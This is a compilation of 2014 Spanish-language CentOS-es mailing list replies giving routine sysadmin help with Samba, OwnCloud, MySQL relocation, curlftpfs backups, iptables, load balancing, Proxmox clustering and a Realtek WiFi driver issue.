Hola, El 24/05/2014 22:43, Reynaldo Salazar escribió: Hola amigos de la lista. Estoy enfrascado en autenticar todos mis servicios con los usuarios de active directory (en Windows Server 2012) entre ellos postfix y dovecot, estoy utilizando Centos 6.5. Si alguien fuera tan amable que tuviera un tutorial donde explique o supiera los pasos a seguir para autenticar estos servidores, por favor me seria de mucha ayuda y estaría eternamente agradecido. Tan fácil como buscarlo en Google: http://lmgtfy.com/?q=postfix+authentication+against+active+directory Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Opinion sobre formas de copiar un archivo entre servidores
El 26/05/2014 18:17, RENE LARA ALVARADO escribió: Buen día. Tengo un par de servidores con centos 5.5 En uno, con un script, cada día respaldo ciertas carpetas usando tar Quiero copiarlas al otro servidor, tambien usando un script. Estoy probando con SCP usando llaves públicas y privadas. Pero me asaltó una duda: ¿es ésta la mejor forma de hacerlo? Me refiero si es de las mas seguras, o si hay otras mas convenientes Yo uso o SCP o rsync Saludos y grcias de antemano. rlara ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Ayuda Samba
Hola, El 21/05/2014 22:42, César Martinez escribió: Saludos amigos listeros aquí una peque duda, tengo un servidor Centos 6.5 que actualmente funciona como server de archivos con un samba-3.6.9-168.el6_5.x86_64, actualmente tengo carpetas públicas y privadas, a las privadas pueden acceder los usuarios que estan en la linea valid users, ahora existe el requermiento de tener carpetas universales por departamentos y dentro de estas cada usuario y que cada uno pueda acceder con su propio usuario y clave, no se si esto se pueda hacer con samba o hay que montar algo adicional, mi esquema actual es el siguiente Actualmente: Ejemplo entro a la red ubico el server, hago click en la carpeta sistemas y me aparece la parte de la validación ara colocar el usuario y la contraseña, si los datos son correctos puedo acceder Con el pedido: Ejemplo entro a la red ubico el server, hago click en la carpeta sistemas acceso sin problemas, dentro de esta carpeta deben aparecer los usuarios por ejemplo cmartinez, soporte, desarrollo etc, al hacer click en una de estas me aparece la parte de la validación de datos usuario y contraseña , si los datos son correctos puedo acceder Este es mi esquema en el archivo smb.conf [sistemas] comment = directorio privado writeable = yes delete readonly = yes browseable = yes valid users = sistemas,cmartinez gues ok = Yes public = No path = /home/sistemas Gracias a todos Hay muchas maneras de hacerlo. La primera que se me ocurre es compartir Sistemas con todo el mundo y luego dar permisos (con ACL mejor) para cada subdirectorio dentro de Sistemas. De esta manera te pedirá login y contraseña cuando entre en Sistemas y luego podrás acceder solo a los subdirectorios donde hayas asignado permisos. Otra manera (solo si tienes security = user) es crear (aparte de smb.conf, donde solo habrá la configuración global) un fichero de configuración para cada usuario y poner allí los directorios que corresponden para cada uno. Si no son muchos usuarios es fácil de hacer y no necesitarás las ACL ya que cada usuario solo podrá acceder a los recursos compartidos que hayas configurado en correspondiente fichero. Finalmente en smb.conf debes poner un include con la ruta al directorio donde guardas todos las ficheros de configuración de los usuarios. Por ejemplo: include = /etc/samba/profils/smb.conf.%U Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Responder: Re: Ayuda Ftp
Hola César El 18/05/2014 1:57, César Martinez escribió: Gracias a todos en realidad con lo que menciono Edwin me funcionó perfecto, ahora debo ver la forma de desmontar la carpeta cuando ese usuario ya no deba usar el path del web, tomaré en cuenta la opción que me menciona Epe que igual me parece genial gracias a todos nuevamente por la ayuda. ¿Qué error te muestra cuando intentas desmontar el directorio? ¿Y en /var/log/messages? ¿sale algo? ¿No estarás intentando desmontarlo estando en el propio directio? Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] ftp
El 19/05/2014 16:29, VICTOR MANUEL VARGAS GONZALEZ escribió: Que tal tengo unos archivos en excel y los estoy compartiendo via ftp , ya los veo pero cuando quiero guarad al gun cambio que haya hecho no me de ja me dice que el archivo es pura lectura como puedo hacer para que se puedan alimentar estos arvhiso via ftp 1. Asegúrate que tienes permisos de escritura sobre el/los fichero/s 2. Monta el directorio FTP como filesystem con FTPfs: http://www.linuxnix.com/2011/03/mount-ftp-server-linux.html -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Actualizar Centos driver en instalación
Hola, El 12/05/2014 11:18, Rocha Torres, Víctor Francisco escribió: Hola a todos , Intento actualizar un driver de una controladora SCSI (LSI V7.17.00.00) en un Centos 5.1 32 bits, la maquina en cuestión es un SUPERMICRO SYS-7046A el driver de la controladora no existía en esos tiempos, y debo mantener la versión por un tema de licencias, el equipo (no tiene disquetera) Se debe de cargar el driver en el inicio de la instalación para crear el sistemas de ficheros. Después de entrar vía consola La pregunta es ¿cómo se monta una unidad USB con, ya que no tiene fstab en /etc , por la consola? Las unidades USB se montan como los discos internos. Mira en /var/log/messages el dispositivo asignado al disco USB que conectas y luego crea un directorio en /mnt y: mount /dev/sdXX /mnt/directorio_creado Seguramente tendrás problemas si el disco USB está en formateado en NTFS. Si es así reformatéalo a FAT. Más info: man mount Gracias De nada. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Alternativa Tipo Dropbox
Sí! Tiene muy buena pinta! Lástima que ya tenga owncloud desde hace tiempo funcionando sin problemas. Ahora cambiar sería una tontería, sobretodo teniendo a los usuarios acostumbrados. Si no me lanzaba ahora mismo. Gracias por la sugerencia. El 30/04/2014 16:25, Peter Q. escribió: Parece ser muy bueno! Gracias por la alternativa. On Apr 30, 2014 9:04 AM, New Route Inc newro...@gmail.com wrote: Saludos, Recomiendo mirar: http://pyd.io/ El 14 de abril de 2014, 16:20, Carlos Restrepo restrcar...@gmail.com escribió: El 14 de abril de 2014, 15:06, César Martinez cmarti...@servicomecuador.com escribió: Saludos Listeros el día de ayer o el sábado alguien me escribió por este tema por error se me borró el email del celular si son tan gentiles y me vuelven a re enviar la o las respuestas, gracias a todos -- Saludos Cordiales |César Martínez | Ingeniero de Sistemas | SERVICOM |Tel: (593-2)554-271 2221-386 | Ext 4501 |Celular: 0999374317 |Skype servicomecuador |Web www.servicomecuador.com Síguenos en: Twitter: @servicomecuador |Facebook: servicomec Zona Clientes: www.servicomecuador.com/billing Blog: http://servicomecuador.com/blog Dir. Av. 10 de Agosto N29-140 Entre Acuña y Cuero y Caicedo Quito - Ecuador - Sudamérica On 11/04/14 12:37, César Martinez wrote: Hola amigos después de investigar me fui por las sugerencias que la mayoría me dió es decir por owncloud estoy en etapa de pruebas y aqui tengo un problema en la sincronización, instale el cliente en mi máquina con fedora 20 y en un equipo con windows 7 se instalo sin problemas en los dos casos entra a al carpeta, pero tengo un problema que por ejemplo subo un archivo accediendo a owncloud desde la web pero en mi máquina con fedora o windows 7 en al carpeta ouncloud no se actualiza es decir debería pasar el mismo procedimiento que con dropbox subo algo y se sincroniza en todas partes done tenga instalado dropbox, he buscado alguna opción para que se sincronice pero no la encuentro alguién de pronto sabe si hay que hacer algún procedimiento extra para ello Gracias a todos ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es Nuevamente. Cesar: Ejecuta el siguiente mandato en tu CentOS como root: getenforce Si la respuesta al comando anterior es: Enforcing tu negación la esta originando SELINUX, y es posible que no te hayas colocado los contextos correspondientes. Verifica los contextos que has aplicado a la carpeta del Owncloud. También puedes mirar el archivo de log del Selinux que esta en /var/log/audit.log. Si tienes el selinux arriba y no le has colocado contexto a la carpeta del Owncloud desactívalo provisionalmente con: setenforce 0 y realiza la prueba de acceso. yo instalo owncloud en /var/www/html/ouncloud y debo aplicar contexto de selinux para que mis usuarios lo puedan acceder. Si tienes el selinux arriba usa el siguiente mandato para colocar los contextos que requiere para que sea accesible por los usuarios. chcon -R -t httpd_sys_rw_content_t /ruta_donde_esta_el_owncloud/ouwncloud Espero te de una luz a tu inconveniente. -- Carlos Restrepo. Móvil: (57) 317 8345628 ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- John Jairo Toro A. NewRoute Inc. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Consuta sobre borrado de carpeta
El 24/04/2014 14:57, Jorge Lluberas escribió: seguramente lo haya borrado desde su terminal con XP, usando el explorador de archivos... Entonces si tienes activado el modulo audit de SAMBA lo encontrarás en los logs. Si no me temo que no. Compruébalo de todas maneras... El 24 de abril de 2014, 9:47, Ernesto Pérez Estévez ernesto.pe...@cedia.org.ec escribió: On 04/24/2014 07:44 AM, Jorge Lluberas wrote: Hay alguna forma de saber, en un server centos , dentro de una carpeta, hay otras subcarpetas, alguien la borró desde una terminal, y quisiera saber (si se puede), quien la borro y la fecha, es viable eso ? claro, depende de cómo entró a borrar si fue por ftp, en los logs de ftp si fue por web, mirando los logs del servidor web (aquí será un poco más difícil) si fue por shell, deberías haber tenido activado el sudo, para que apareciera sudo rm -rf blablabla O quizá tenías instalado el rpm de bash que tiene syslog activado y toda la actividad se guardó hacia los logs. Este rpm está en nuestro repo: http://centos6.ecualinux.com/x86_64/repoview/bash.html saludos epe ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] servidores no logran verse los usuarios
Hola El 12/04/2014 7:47, William Romero escribió: hola lista. quisiera hacerles una consulta , tengo 2 servidores de firewal en centos cada uno tiene diferente proveedor de internet, todo funciona bien, pero tengo una problema con 3 servidor que es de correos electronicos tambien en centos. el firewall 1 , tiene la direccion 192.168.1.7 /dmz 192.168.20.20 el firewall 2 , tiene la direccion 192.168.1.10 /dmz 192.1682.20.5 el servidor de correos tiene la direccion 192.168.20.13/gateway 192.168.20.20 cuando paso a los usuarios al firewall 1 todos pueden tener correos electronicos y pueden ver la direccion publica del servidor de correos ingresando a http://mail.server de correo.com pero cuando paso a los usuarios al firewal 2 la direccion de http://mail.server de correo.com no la puede ver , sin embargo puedo hacerle ping. cual seria la solucion para llevar que todos los usuarios del firewall 2 enruten hacia el server firewall 1 y pueden resolver la direccion web mencioanda yo tengo iptables en los 2 server corriendo super bien . Tu servidor de correo usa siempre el firewall 1 para responder las solicitudes (aunque le lleguen del firewall 2). De ahí puede venir el problema. Un firewall puede cortar la conexión si detecta que el camino seguido por los paquetes es distinto entre la ida y la vuelta. Usa los logs del firewall 1 para confirmar esto. Deberías ver que las respuestas del servidor de correo (hacia tus clientes) son denegadas. saludos y gracias de antemano. William Romero -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Como sincronizar servidores web
El 08/04/2014 10:19, Rodolfo Edgar escribió: Hola lista, mi pregunta es cómo sincronizar no sé si será la palabra correcta, pero lo que quiero es saber cómo hacer que dos o más servidores webs acepten peticiones según el tráfico, por ejemplo el servidor 1 esta procesando datos y tiene mucha carga, el servidor 2 debe actuar como ayuda y también aceptar peticiones, el detalle es que se usa base de datos en un servidor y programción en php (supongo que los scripts php habrá que poner o estar en todos los servidores), no sé cómo podría hacer eso, estuve mirando algo en internet sobre rsync, pero más hablan sobre archivos. También había oído antes que eso se podría hacer con ntfs algo asi, pero no dieron detalles de cómo se podrían compartir datos de forma automática, que unos usuarios esten conectados a un servidor ingresando datos a una base de datos y otro servidor web ayude también haciendo lo mismo y escribiendo en alguna base de datos común. También dijeron que era algo similar a balanceo de carga, pero esa vez que vi un tutorial solo se hacia con datos estaticos, osea html, nada de programación y base de datos, ahí fue que escuché que hay que compartir de alguna manera con ntfs y no sé que más, estoy un poco falto es esa situación me podrían orientar amigos? de antemano les agradezco que me den pistas, se despide su amigo Edgar bye! Lo que tu quieres es balanceo de carga. Se puede hacer de diferentes maneras, depende del presupuesto y de la carga que vaya a tener la web. Una manera sencilla es hacerlo por DNS. Necesitarás dos servidores para la web (sincroniza los archivos de la web por NFS, GlusterFS o DRBD) y otro para la base de datos (esta en el servidor más potente ya que será atacada por los servidores web). Luego creas dos registros DNS con el mismo nombre pero que apuntan a cada uno de los dos servidores web: www.ejemplo.com 10.111.123.120 www.ejemplo.com 10.111.123.121 El servidor DNS alternará sus respuestas con cada petición que reciba. No es el mejor método pero sirve. Cuando un servidor caiga tendrás un pequeño timeout y finalmente saltará al que está funcionando. Para solucionar esto implementa Hearbeat entre los dos servidores web para que cuando uno caiga el otro coja momentáneamente la IP del caído. Otra solución para ahorrarte el tercer servidor (el de la base de datos) es configurar MySQL en modo replicación y poner en un servidor web el master de MySQL y en el otro el slave. Finalmente también podrías añadir un proxy http (idealmente nginx) antes de los servidores web para balancear la carga. De paso acelerarías el tráfico ya que también haría de proxy. Para sitios con mucha carga este paso opcional sería deseable e incluso imprescindible. Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Alternativa Tipo Dropbox
El 05/04/2014 3:33, César Martinez escribió: Saludos listeros tengo un requerimiento para montar un sistema tipo dropbox, la idea es que los vendedores de la emrpesa que andan fuera de la ciudad tengan en sus equipos (windows) una carpeta que tenga como enlace el servidor en la oficina hacen click y se conectan a esta carpeta, aquí puedan copiar pegar o trabajar sobre algún archivo que este ahí, algo como una vpn. Alguien a montado algo así sobre centos, agradezco sus comentarios. Yo también tengo owncloud, aunque sobre Ubuntu. He oido hablar bien de Sparkleshare que también en libre. Parece que no es tan pesado y completo como owncloud pero es mucho más sencillo: http://sparkleshare.org/ Gracias César Saludos. -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Responder: Re: Alternativa Tipo Dropbox
El 05/04/2014 21:31, Diego escribió: Más allá que todos te recomendamos que utilices owncloud (yo lo estoy haciendo ahora), no te olvides de: # Tenerlo actualizado. Son bastantes seguidas # utiliza ssl aunque sea autoafirmación (pero ssl firmados por una CA hay desde 10 usd) +1. Desde el perfil de un administrador puedes activar una opción para forzar que los usuarios usen siempre HTTPS contra tu servidor owncloud. Yo lo tengo y me quedo más tranquilo. # si puedes, una vpn. Enviado desde mi teléfono inteligente Sony Xperia™ Mauricio Pastorini mpastor...@soporte-online.cl escribió: César, prueba https://owncloud.com/ saludos El 4 de abril de 2014, 22:33, César Martinez cmarti...@servicomecuador.comescribió: Saludos listeros tengo un requerimiento para montar un sistema tipo dropbox, la idea es que los vendedores de la emrpesa que andan fuera de la ciudad tengan en sus equipos (windows) una carpeta que tenga como enlace el servidor en la oficina hacen click y se conectan a esta carpeta, aquí puedan copiar pegar o trabajar sobre algún archivo que este ahí, algo como una vpn. Alguien a montado algo así sobre centos, agradezco sus comentarios. Gracias César ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- *Mauricio Pastorini Torres* Gerente de Desarrollo *SISTEMAS DE GESTION ONLINE LTDA*. http://www.gestion-online.cl E-Mail: mpastor...@soporte-online.cl mpastor...@soporte-online.cl *+56 9 7439* ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] curlftpfs
Hola, No he usado nunca dirvish ni curlftp. ¿curlftp te monta una conexión FTP sobre el sistema de archivos? ¿Has comprobado si es un problema de permisos? Es decir, ¿con que usuario hiciste las pruebas de curlftp y con que usuario lanzas el script? Finalmente, ¿puedes ser más concreto con el error y pegarlo en la lista? ¿Donde se supone que está el log al que no puede acceder? Saludos. El 03/04/2014 19:45, victor santana escribió: Hola hace unos días que puse esto y nadie ha sabido contestarme...lo vuelvo a poner a ver si alguien puede darme alguna idea... Hola amiguetes, tengo un problema y es que he montado dirvish para realizar backups de mi servidor mediante snapshot. Resulta que el sistema de disco para backups que ofrece mi proveedor es a través de ftp y no permite acceso ssh...así que mese ocurrió montar una carpeta que apunte al servidor ftp mediante curlftps; el montaje en teoría es correcto ya que me deja escribir, borrar y mover datos en esa localización. El problema viene que al lanzar dirvish, me da un error: no localiza el archivo log. Como prueba hice otra carpeta de forma local y lancé el dirvish en esa carpeta e hizo el backup de archivos sin errores. El problema lo tengo precisamente en esa carpeta montada por ftp con curlftpfs... ¿alguna idea? ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] curlftpfs
El 04/04/2014 12:07, victor santana escribió: Gracias Francesc por contestar. Curlftpfs monta en tu equipo una carpeta via ftp; como montar una carpeta samba o cifs pero con ftp El usuario ftp se valida en el servidor remoto obviamente; como dije hice una prueba y puedo escribir en esa carpeta directamente sin problemas; el problema es cuando lo combino con el programa disvish que hace snapshots de mi servidor. No estoy seguro pero quizas tenga que ver con los enlaces que crea el dirvish. Permisos, no estoy seguro al 100% pero creo que no...como dije puedo escribir directamente en esa carpeta montada. ¿El usuario con el que lanzas dirvish es el mismo que con el que has hecho las pruebas de escritura? Es decir, si la prueba de escritura la has hecho desde el usuario administrador, ¿estás lanzando dirvish también desde el usuario administrador? El error que sale al lanzar dirvish sobre esta carpeta es el siguiente: etc:default:20140404: cannot open log file /dat/etc/20140404/log donde la ruta /dat/etc/20140404/ es correcta, /dat/ es la carpeta montada via ftp con curlftpfs, y la fecha corresponde con la fecha en que se lanza el backup, la carpeta se crea, pero luego existe por defecto la carpeta /dat/etc/20140404/tree/ que contiene los ficheros copiados, pero aunque se crea la carpeta, el directorio está vacio. ¿Y el directorio /dat/etc/20140404/log? ¿También lo crea? ¿help?¿ideas? El 4 de abril de 2014, 7:52, Francesc Guitart fguit...@gmx.com escribió: Hola, No he usado nunca dirvish ni curlftp. ¿curlftp te monta una conexión FTP sobre el sistema de archivos? ¿Has comprobado si es un problema de permisos? Es decir, ¿con que usuario hiciste las pruebas de curlftp y con que usuario lanzas el script? Finalmente, ¿puedes ser más concreto con el error y pegarlo en la lista? ¿Donde se supone que está el log al que no puede acceder? Saludos. El 03/04/2014 19:45, victor santana escribió: Hola hace unos días que puse esto y nadie ha sabido contestarme...lo vuelvo a poner a ver si alguien puede darme alguna idea... Hola amiguetes, tengo un problema y es que he montado dirvish para realizar backups de mi servidor mediante snapshot. Resulta que el sistema de disco para backups que ofrece mi proveedor es a través de ftp y no permite acceso ssh...así que mese ocurrió montar una carpeta que apunte al servidor ftp mediante curlftps; el montaje en teoría es correcto ya que me deja escribir, borrar y mover datos en esa localización. El problema viene que al lanzar dirvish, me da un error: no localiza el archivo log. Como prueba hice otra carpeta de forma local y lancé el dirvish en esa carpeta e hizo el backup de archivos sin errores. El problema lo tengo precisamente en esa carpeta montada por ftp con curlftpfs... ¿alguna idea? ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Actualizar Iptables
Hola, El 03/04/2014 0:19, César Martinez escribió: Saludos amigos listeros, tengo un servidor Linux Centos 5.10 de 64 bits, mi kernel actual es 2.6.18-371.6.1.el5 y la versión de iptables que tengo es 1.3.5-9.2.el5_8, estoy tratando de actualizar a la versión 1.4.14 ya que algunas reglas últimas que he aplicado recientemente no funcionan, googleando veo que la versión es incompatible con estas reglas, entonces me dispuse a actualizar siguiendo algunos manuales entre ellos estos que creo que son los más claros http://www.webvigo.com/blog/actualizar-iptables-1-4-14-en-centos-5-10/ y http://www.squldvision.info/2012/05/29/update-iptables-centos5/, pero no logro hacer que me funcione, inclusive traté de hacerlo compilando manual peo no me funciona. Cuando trato de instalar de esta forma rpm -i iptables-1.4.14-1.x86_64.rpm tengo estos errores error: Error de dependencias: iptables 1.3.2-1 entra en conflicto con kernel-2.6.18-308.el5.x86_64 iptables 1.3.2-1 entra en conflicto con kernel-2.6.18-371.6.1.el5.x86_64 ¿Has hecho antes un yum update? Si sigue dando problemas de dependencias intenta pasar a CentOS 5.5 o 5.7 donde el kernel 2.6.18 sea instalable desde los repos. De pronto alguien a logrado actualizar via repositorios o de otra forma probada. De antemano gracias a todos Saludos. César ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Reubicar mysql
El 27/03/2014 2:59, Fermin Francisco escribió: Otra cosa q se me olvido contarles es q el archivo /usr/copartida/sistema/log/mysqld.log no se registra ninguna accion de error ni de nada, el archivo esta vacio. Estos son los permiso de /usr/copartida/sistema/MySQL/MySQL_5.1/data/ ls -l drwx--. 2 mysql mysql 4096 Mar 26 20:55 mysql drwx--. 2 mysql mysql 4096 Mar 26 20:55 test Asegúrate también que todos los directorios hasta llegar a data/servidor.lower-test tienen permisos de ejecución (la x). Estos son los permisos de /usr/copartida/sistema/log/mysqld.log ls -l -rw-r-. 1 mysql mysql 0 Mar 26 21:43 mysqld.log Todo esto ejecutando con usuario root. Si los directorios y ficheros tienen como propietario mysql, ¿porqué lanzas MySQL con el usuario root? JOSE FERMIN El Miércoles, 26 de marzo, 2014 9:42 P.M., Aland Laines aland.lai...@gmail.com escribió: eso suena a permisos... Aland Laines Calonge programador de aplicativos web Twitter: @lainessolutions Comunidad CakePHP en Español Google+ http://about.me/aland.laines El 26 de marzo de 2014, 20:38, Fermin Francisco abc...@yahoo.com escribió: Gracias a todos por sus atinadas respuestas. Bien hice los cambios en el archivo /etc/my.cnf, pero el servicio mysqld no quiere correr y lanza el siguiente mensaje: [Warning] Can't create test file /usr/copartida/sistema/MySQL/MySQL_5.1/data/servidor.lower-test ERROR: 1005 Can't create table 'db' (errno: 13) [ERROR] Aborting Installation of system tables failed! JOSE FERMIN El Martes, 25 de marzo, 2014 9:37 A.M., angel jauregui darkdiabl...@gmail.com escribió: Si estas usando CentOS es seguro que la configuracion del MySQL se tome de /etc/my.cnf, te pongo lo que dice en el mio: [mysqld] datadir=/var/lib/mysql socket=/var/lib/mysql/mysql.sock user=mysql # Disabling symbolic-links is recommended to prevent assorted security risks symbolic-links=0 bind-address=a.b.c.d [mysqld_safe] log-error=/var/log/mysqld.log pid-file=/var/run/mysqld/mysqld.pid La variable *datadir* indica en donde estara guardandose las BDD que se creen, puedes editar esa linea y poner la direccion que desees, solo *OJO* con los permisos que mejor ejemplo que ver los permisos de /var/lib/mysql e igualalos en tu directorio personal. Saludos ! El 25 de marzo de 2014, 7:59, Ernesto Pérez Estévez, Ing. ernesto.pe...@cedia.org.ec escribió: On 03/24/2014 08:21 PM, Fermin Francisco wrote: Buenas noches!! Tengo una interrogante: Despues de instalar mysql y crear una base de datos y sus tablas correspondientes se la puede reubicar la carpeta de su ubicacion por defecto de mysql en /var/lib/mysql a otro lugar que pudiera ser /usr/carpeta/mysql?? sí, hazle un enlace directo al final, par que cuando vayas a /var/lib/mysql , llegues a la carpeta nueva.. sólo eso en teoría. Y que otros archivos hay que modificar para que las base de datos funcionen con normalidad?? JOSE FERMIN ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es Email secured by Check Point -- Ernesto Pérez +593 9 9924 6504 ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- M.S.I. Angel Haniel Cantu Jauregui. Celular: (011-52-1)-899-871-17-22 E-Mail: angel.ca...@sie-group.net Web: http://www.sie-group.net/ Cd. Reynosa Tamaulipas. ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] [Off-Topic] Centos, proxmox y cluster
El 27/03/2014 7:46, Raul Arboleda Une escribió: Hola Amigos alguno de ustedes tiene un amnual bueno sobre montaje de cluster y si me pueden dar un breve dato de para que sirve en realidad Cluster, teniendo dos servidores con discos internos se puede hacer algo o solo funciona con NAS, bueno si alguno tiene o sabe darme algo de información se los agradezco. Sí, sí se puede. Cuando estuve evaluando Proxmox hace unos meses encontré estos buenos howtos(1)(2). Para mantener los discos duros internos sincronizados lo hacen con DRBD. Aunque se me ocurre que también podrías hacerlo con GlusterFS(3), parece sencillo. El clúster te servirá de failover. Si un host cae las máquinas virtuales que corren en dicho host son levantadas en otro host. (1) https://alteeve.ca/w/2-Node_Red_Hat_KVM_Cluster_Tutorial (2) http://pve.proxmox.com/wiki/Two-Node_High_Availability_Cluster (3) http://www.linuxjournal.com/content/two-pi-r Raúl Eduardo Arboleda Zapata Ingeniero de Sistemas Unninca Cel +573 300 620 66 13 +573 312 288 90 86 Medellín, Antioquia Colombia, S.A ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Reubicar mysql
El 25/03/2014 2:21, Fermin Francisco escribió: Buenas noches!! Tengo una interrogante: Despues de instalar mysql y crear una base de datos y sus tablas correspondientes se la puede reubicar la carpeta de su ubicacion por defecto de mysql en /var/lib/mysql a otro lugar que pudiera ser /usr/carpeta/mysql?? Y que otros archivos hay que modificar para que las base de datos funcionen con normalidad?? No soy un experto en MySQL pero como dice Angel creo que solo tienes que modificar, con la nueva ubicación, el fichero de configuración de MySQL /etc/my.cnf JOSE FERMIN ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] [Off-Topic] Driver WiFi Realtek me cicla la Laptop !
El 21/03/2014 17:28, angel jauregui escribió: @Luis no es posible ya que la versión del módulo en las página de realtek no es para la versión del kernel mas reciente en ubuntu, hasta lo intente y simplemente las errores que tira son sobre la versión reciente del kernel... tendría que esperar a que liberaran una versión mas nueva :( @Francés José porque la actualización del kernel no me guardo en el grub la linea para ir al kernel anterior, y checando mi sistema también borro el kernel antiguo :( Que raro, a mi siempre me toca desinstalar los kernels antiguos a mano. Creo que tendré que poner el kernel anterior al actual desde el repo... Saludos El lunes, 17 de marzo de 2014, Luis Muñoz Urrutia luis_2...@hotmail.com escribió: (perdón top-posting, pero me toca salir asi que doy respuesta rápida) Creo que para ese caso, la opción seria hacer una reinstalación del modulo rtl, usando para ello el driver para Linux de tu tarjeta realtek, para esto puedes buscar algo como. Driver tarjeta inalámbrica realtek 8188ce Linux. Saludos Enviado desde Correo de Windows De: Francesc Guitart Enviado el: lunes, 17 de marzo de 2014 12:20 Para: centos-es@centos.org javascript:; El 17/03/2014 16:11, angel jauregui escribió: Buen día. Lo he marcado como *Off-Topic* porque no es enfocado a CentOS, asi que se agradece enormemente al que me brinde su apoyo :D. Tengo Ubuntu en mi laptop y hace una semana mas o menos salio en los repos la actualización para el Kernel, la aplique en su momento y me lleve la sorpresa que al parecer el *driver* para mi Wifi Realtek 8188CE viene da~ado en los módulos o nose si sea algún otro modulo el que este da~ado, el detalle es que simplemente al cargarse el modulo *rtl8192ce* y este a su vez carga varios módulos mas, me cicla el equipo. El ciclado no es solo que se congele la pantalla, sino que me saca las las Xs (ambiente ventanas) y me muestra los errores (tipo Kernel Panic!) en pantalla. Y ya no puedo desplazarme ni hacer nada, simplemente queda apagar el equipo dejando pulsado el boton de Power !. Verificando el log de syslog led dejo el buffer del error: http://pastebin.com/WziFpidD *De momento* tuve que entrara a ubuntu con Jaula (chroot usando GNU/Linux Buteable), editar el *modules.d/blacklist.conf* y poner todos los módulos rtl*, para que pudiera encender mi equipo y trabajar en el, porque de lo contrario mientras encendía y se intentaba cargar el modulo de la wifi se ciclaba inmediatamente ! Ahorita tengo en blacklist los módulos rtl* para que pueda encender y estoy trabajando con la LAN :'( *Alguna recomendacion, opinion o en que foro poner este mensaje/bug ?* Para reportar bugs en Ubuntu: https://help.ubuntu.com/community/ReportingBugs No tengo ni idea de como solucionar tu problema pero en vez de blacklistar todos los módules rtl, ¿has intentado arrancar con el kernel antiguo? Si funcionara tendrías el ordenador operativo con WiFi otra vez. Saludos ! -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org javascript:; http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org javascript:; http://lists.centos.org/mailman/listinfo/centos-es -- Francesc Guitart ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
